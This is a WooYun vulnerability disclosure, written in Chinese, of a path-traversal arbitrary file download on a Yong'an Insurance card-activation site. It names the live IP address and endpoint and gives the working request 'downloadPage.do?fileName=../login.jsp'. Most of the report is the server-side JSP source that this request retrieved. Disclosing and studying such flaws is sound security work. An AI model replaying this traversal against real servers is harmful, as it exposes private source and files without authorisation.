当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142617

漏洞标题:永安保险某保险卡站点设计不当存在任意文件下载漏洞

相关厂商:永安财产保险股份有限公司

漏洞作者: 路人甲

提交时间:2015-09-22 11:05

修复时间:2015-09-27 11:06

公开时间:2015-09-27 11:06

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任意文件下载

详细说明:

http://1.85.2.249/online/web/sale/card/login.jsp

1.jpg


看到有一处点了 会下载PDF文件
http://1.85.2.249/online/sale/card/downloadPage.do?fileName=190.pdf
果断替换后面的
先现在index.jsp测试下 我用的火狐测试

2.jpg


<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<base href="<%=basePath%>">

<title>JasperReport事例</title>
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="This is my page">
<!--
<link rel="stylesheet" type="text/css" href="styles.css">
-->
</head>

<body>
<s:form action="iReport.action">
报表格式:
<s:select name="formatType" list="#{'HTML':'HTML','PDF':'PDF','XLS':'XLS','RTF':'RTF'}"></s:select>
<s:submit value="确定"/>
</s:form>
<s:form action="iReport2.action">
<s:submit value="下载"/>
</s:form>
<s:form action="toPrint.action">
<s:submit value="打印"/>
</s:form>
</body>
</html>


在下载一个http://1.85.2.249/online/web/sale/card/login.jsp
的login.jsp
http://1.85.2.249/online/sale/card/downloadPage.do?fileName=../login.jsp

3.jpg


4.jpg

漏洞证明:

login.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ include file="/common/taglibs.jsp" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>永安保险</title>
<link href="${ctx }/css/common/formCheck.css" type="text/css" rel="stylesheet" />
<link href="${ctx }/css/cssCard/master.css" type="text/css" rel="stylesheet"/>
<script type="text/javascript" src="${ctx}/js/jquery-1.6.2.min.js"></script>
<script type="text/javascript" src="${ctx }/web/sale/card/js/common.js"></script>
<script type="text/javascript" src="${ctx }/js/checkform/formCheck.validation.js"></script>
<script type="text/javascript" src="${ctx }/js/checkform/formCheck.extend.js"></script>
<script type="text/javascript" src="${ctx }/js/trimForm.js"></script>
<script type="text/javascript" src="${ctx}/js/public/common.js"></script>
<script><%-- google web Analytics--%>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-49712039-1', '1.85.2.249');
ga('send', 'pageview');
</script>
</head>
<%@ include file="/common/service/messageLayer.jsp"%>
<body class="body_bg">
<input id="cardmsg" type="hidden" value="${errormsg }"/>
<div class="index_bg">
<div id="header">
<div class="top">&nbsp;</div>
<div class="logo"><a href="#" title="永安保险"><img src="${ctx }/images/imagesCard/logo.gif" width="321" height="48" alt="永安保险"/></a></div>
<div class="clear"></div>
</div>
<div id="content">
<div class="insure_left">
<div class="l">
<img width="240" height="60" src="${ctx }/images/imagesCard/cardServices.gif">
</div>
<div class="l margT10 margB10">
<img width="240" height="37" src="${ctx }/images/imagesCard/activeOnline.gif">
</div>
<%@ include file="/web/sale/card/common/menu.jsp" %>
</div>
<div class="insure_right">
<span class="bg_1"></span>
<div class="auto_fast">
<h2>您现在的位置:保险卡&nbsp;&gt;&nbsp;保险卡激活</h2>
<div class="clear"></div>
<div class="auto_vehicle">
<dl>
<dt><span>请输入您的卡号及密码</span></dt>
</dl>

<div class="info">
<form id="subFm" action="${ctx }/sale/card/login.do" method="post">
<ul>
<li></li>
<li><label><b class="col_e83">*</b>卡&#12288;号</label><input id="quoteNo" name="geQuoteMain.cardNo" type="text" class="input_text"
bind="focus" tipmsg="请输入卡号" tipid="quoteNo_tip" trim cType="notEmpty|myRule" errmsg="不允许为空|格式不正确"/>
<span id="quoteNo_tip" style="position: absolute;"></span>
</li>
<li><label><b class="col_e83">*</b>密&#12288;码</label><input id="pwd" name="geQuoteMain.flag" type="password" class="input_text"
bind="focus" tipmsg="请输入密码" tipid="pwd_tip" trim cType="notEmpty|regexp" regexp="^[0-9]{1,10}$" errmsg="不允许为空|格式不正确"/>
<span id="pwd_tip" style="position: absolute;"></span>
</li>
<li style="position: relative;"><label>验证码</label><input class="input_check" type="text" name="input" id="rand">
<a href="javascript:changeImage();"><img id="randImge" src="${ctx }/CreateImage" style="position:absolute;left: 335px;top:0"/></a>
<span id="rand_tip" tipresult="false" style="position: absolute;left:380px"></span>
</li>
</ul>
<div class="button_login"> <a href="javascript:subForm();" class="vip_login">&nbsp;</a></div><div class="clear"></div>
</form> </div>
<div class="active_steps_wrap">●&nbsp;激活流程
<div class="active_steps">
<dl> 1.输入保险卡卡号及密码</dl>
<span class="l" style="font-weight: normal;padding-top: 12px">&gt;</span>
<dl>2.阅读“投保说明”</dl>
<span class="l" style="font-weight: normal;padding-top: 12px">&gt;</span>
<dl>3.填写激活信息</dl><span class="arrow">&nbsp;</span>
<div class="clear"></div>
<dl>6.下载电子保单</dl>
<span class="l" style="font-weight: normal;padding-top: 12px">&lt;</span>
<dl>5.激活成功</dl>
<span class="l" style="font-weight: normal;padding-top: 12px">&lt;</span>
<dl>4.保单信息确认</dl>
<div class="clear"></div>
</div>
<div class="clear"></div>
</div>
</div>
<br>
<div>
<dl>
<dt>
<span style="color:#FF6600">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;提示:尊敬的客户,为了使您在激活流程中获得较好的体验,请使用IE高版本及其他主流浏览器。
</span>
</dt>
</dl>
</div>
</div>
<span class="bg_2"></span>
</div>
<div class="clear"></div>
<%@include file="/web/sale/card/common/foot.jsp" %>
</div>
<div id="footer">版权所有 © 永安财产保险股份有限公司</div>
</div>
</body>
<script type="text/javascript">
$(function(){
var errormsg = $("#cardmsg").val();
if(errormsg != null && errormsg != ''){
showError(errormsg);
}
})
var check = new SFEC();
$(document).ready(function(){
check.setForm("subFm");
check.addRule('myRule',function(obj){
return /[0-9]{1,12}/.test($(obj).val());
});
check.start();
});
function changeImage(){
$("#randImge").attr("src","${ctx}/CreateImage?"+ Math.random());
}
/**ajax验证验证码**/
function checkCode() {
var dataFlag = false;
$.ajax({
type : "POST",
async : false,
url : '${ctx}/sale/card/checkAjax.do?temp='+new Date().getTime(),
dataType : 'text',
data : {checkCode : $("#rand").val()},
success : function(data){
if($.trim(data) == "success") {
dataFlag = true;
} else {
dataFlag = false;
}
}
});
return dataFlag;
}
function subForm(){
if(check.result(true)){
if(checkCode()){
//提交表单
$("#subFm").submit();
}else{
//验证码错误
$("#rand_tip").text("验证码输入错误");
changeImage();
$("#rand").val("");
}
}
}
</script>
</body>
</html>

修复方案:

白名单

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-27 11:06

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论